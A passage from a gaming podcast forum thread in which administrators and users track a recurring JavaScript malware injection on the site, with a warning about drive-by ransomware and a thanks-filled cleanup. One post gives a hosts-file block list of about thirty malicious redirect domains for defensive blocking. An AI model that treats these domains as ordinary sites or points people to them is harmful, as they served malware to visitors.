Jump to content

  • Log in with Facebook Log in with Twitter Log In with Google      Sign In   
  • Create Account
Photo

Site Alerts


  • Please log in to reply
74 replies to this topic

#41 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 27 February 2016 - 08:35 PM

We are working with the host now to try and figure out what is going on.

 

They are disabling and cleaning files and monitoring for reinfection so we can try and figure out how to fix this for good.......

 

Grrrrrr!

 

Hal :hal:


  • 0

#42 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 28 February 2016 - 05:51 AM

Reinfection has occurred. Affected files including but maybe not limited to: lang-sql.js, lightbox.js, prettify.js, ips.ibEconomyMemPane.js, main.js, jquery.js.

Dodgy domain this time is js DOT zelenuenogotochki DOT info/hellomylittlepiggy/
  • 0

#43 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 28 February 2016 - 04:36 PM

Okay, once again some JS files are infected and some aren't - so there are no cross-domain requests to dodgy URLs if you just go to the homepage, but there are if you then navigate to the Gallery, for instance.

I don't want to retype everything I've just posted on the Facebook page - but this is important. In an earlier version of this infection campaign against other websites, IF you were using IE11 AND you had a screen resolution greater than 800x600, an attempt would be made (after further domain redirects) to carry out a drive-by ransomware install attempt against you. So avoiding THAT browser is very important.

The list of dodgy domains involved keeps growing. I'm not sure if there's any benefit from my continuing to post the ones involved as their replacements might just be randomly generated a day or so later and not everyone knows how to block them with a Hosts file anyway. Still, the current two in this site's infected JS files are:

js DOT sinienogotochki DOT info
news DOT beluihameleon DOT info

A safe way to check for infection without actually coming on this site is to go to https://aw-snap.info/file-viewer/ and type rpgmp3.com into the search box there. It finds the infected JS files more effectively than me navigating around the site and looking at them with Firefox addons!
  • 0

#44 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 29 February 2016 - 02:23 PM

We have attempted to cleanse the server with holy fire... We have lost a bunch of stuff but it seems to be the only sure fire way to get this resolved.

 

We have damaged the site code by killing files but she should be able to reload from a clean copy on we are officially clean and server is hardened a little more.

 

Fingers are firmly crossed...

 

Thanks to all who are helping with this. It has been a total nightmare...

 

Hal :hal:


  • 0

#45 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 29 February 2016 - 04:05 PM

So far... the site has NOT been reinfected! Woo-hoo! Let's hope this keeps up.

 

In case anyone encounters this hack on another website (and it was widespread on a lot of Wordpress and Joomla sites, rpgmp3 will not be the only one recently affected), here are all the dodgy domains I know about that were involved in hacks on this site and in the same hack on other sites so far, in a format suitable for blocking in your Hosts file should you know how to use it:

 

(Note: This is mostly the result of me googling for lists of domains involved when other sites were hacked in this way. Only a few of these domains were involved in the RPGMP3 hack.)

127.0.0.1 belayamorda.info
127.0.0.1 img.belayamorda.info
127.0.0.1 beluihameleon.info
127.0.0.1 news.beluihameleon.info
127.0.0.1 chernayadama.info
127.0.0.1 pon.chernayadama.info
127.0.0.1 chernayamorda.info
127.0.0.1 css.chernayamorda.info
127.0.0.1 geltuihameleon.info
127.0.0.1 site.geltuihameleon.info
127.0.0.1 goltayamorda.info
127.0.0.1 img.goltayamorda.info
127.0.0.1 krasnayamorda.info
127.0.0.1 img.krasnayamorda.info
127.0.0.1 pon.krasnayadama.info
127.0.0.1 krasnuenogotochki.info
127.0.0.1 js.krasnuenogotochki.info
127.0.0.1 sinienogotochki.info
127.0.0.1 js.sinienogotochki.info
127.0.0.1 sinyayamorda.info
127.0.0.1 css.sinyayamorda.info
127.0.0.1 js.sinyayamorda.info
127.0.0.1 stervapoimeniliana.info
127.0.0.1 vrot.stervapoimeniliana.info
127.0.0.1 yasyka4lyamahochy.info
127.0.0.1 zxc.yasyka4lyamahochy.info
127.0.0.1 zelenayamorda.info
127.0.0.1 img.zelenayamorda.info
127.0.0.1 zelenuenogotochki.info
127.0.0.1 js.zelenuenogotochki.info

  • 0

#46 Lockhart

Lockhart

    Yorkton Gamer & RPGMP3 Professional

  • Administrators
  • 1,238 posts
  • Amazon Wishlist
  • LocationRegina, SK, Canada

Posted 29 February 2016 - 05:56 PM

Huzzah!

 

What was lost? Site seems pretty intact from my user perspective.


  • 0

#47 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 01 March 2016 - 06:10 AM

Will recent episodes start making it to iTunes now?
  • 0

#48 Thing

Thing

    a Bad Man

  • Administrators
  • 12,601 posts
  • LocationNear Seattle, WA, USA

Posted 01 March 2016 - 09:02 AM

Now that it looks like the site is clean (from a malware standpoint at least, we are still a bit filthy at times ;) ) we need to update and replace some files that the hosting companies abuse team disabled and deleted, and do a bit more proactive hardening against future issues.  The podcast feeds should be getting updated pretty soon, but the details on that are up to Hal.


  • 2

#49 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 01 March 2016 - 09:50 AM

There a massive amount of content in The Vault to release as the contributors have been uploading unabated while the main site has had issues - the contributor uploader is separate to the site itself.

 

I also have a large number of Pathfinder recordings from our group to release so expect to see that shortly as well.

 

I am waiting for the green light from Google that they consider the site clean - hopefully get that today and then I'll start to release more stuff at a rapid rate to catch up.

 

Thanks to everyone who stuck with us through this horrid nightmare and special thanks to all the site users who have been helping Thing and I out - you guys rock!

 

Prepare you ear holes for a tsunami of awesome tabletop audio goodness...

 

Hal :hal:


  • 4

#50 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 01 March 2016 - 12:22 PM

Woo! Thank you all for your hard work.  :)


  • 1

#51 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 01 March 2016 - 03:57 PM

Three cheers for Hal and Thing and all the rest here on RPGMP3 .com
  • 4

#52 kendoyle659

kendoyle659

    RPGMP3 Patron

  • Patrons
  • 446 posts
  • LocationYork

Posted 02 March 2016 - 09:59 AM

Hip Hip Hurray


  • 1

#53 ThistledownJohn

ThistledownJohn

    Ghoul

  • Members
  • 532 posts
  • LocationBonne Terre, MO USA

Posted 02 March 2016 - 01:31 PM

Great news!  :D


  • 0

#54 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 02 March 2016 - 03:20 PM

:)

 

Looks like we are still clear... time to get back to normal running :D

 

Hal :hal:


  • 2

#55 Lucky_Strike

Lucky_Strike

    Goblin

  • Patrons
  • 204 posts
  • Amazon Wishlist
  • LocationLittle Rock, AR

Posted 02 March 2016 - 05:16 PM

Well done! Appreciate the hard work and looking forced to the new audio.
  • 0

#56 Skyth

Skyth

    Kobold

  • Members
  • 71 posts

Posted 06 March 2016 - 12:12 PM

Looking forward to more recordings.  Been going through withdrawals at work...Had to start listening to Beer and Battle ;)


  • 1

#57 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 08 March 2016 - 11:36 AM

Seems we are back fixed and secure with any luck... (again)

 

I will be releasing content from The Vault over the next few days and then I am going to establish a release schedule so we can avoid these feast or famine moments as much as possible :)

 

How does that sound?

 

Hal :hal:


  • 1

#58 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 08 March 2016 - 01:43 PM

Inconceivable! That is how it sounds.
  • 0

#59 ThistledownJohn

ThistledownJohn

    Ghoul

  • Members
  • 532 posts
  • LocationBonne Terre, MO USA

Posted 08 March 2016 - 05:12 PM

Seems we are back fixed and secure with any luck... (again)

 

I will be releasing content from The Vault over the next few days and then I am going to establish a release schedule so we can avoid these feast or famine moments as much as possible :)

 

How does that sound?

 

Hal :hal:

 

Sounds like sweet, sweet music.  :D


  • 1

#60 Lockhart

Lockhart

    Yorkton Gamer & RPGMP3 Professional

  • Administrators
  • 1,238 posts
  • Amazon Wishlist
  • LocationRegina, SK, Canada

Posted 08 March 2016 - 06:03 PM

Sounds like I should get back to the Yorkton Editting and Release mines.


  • 1




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Gravityscan Badge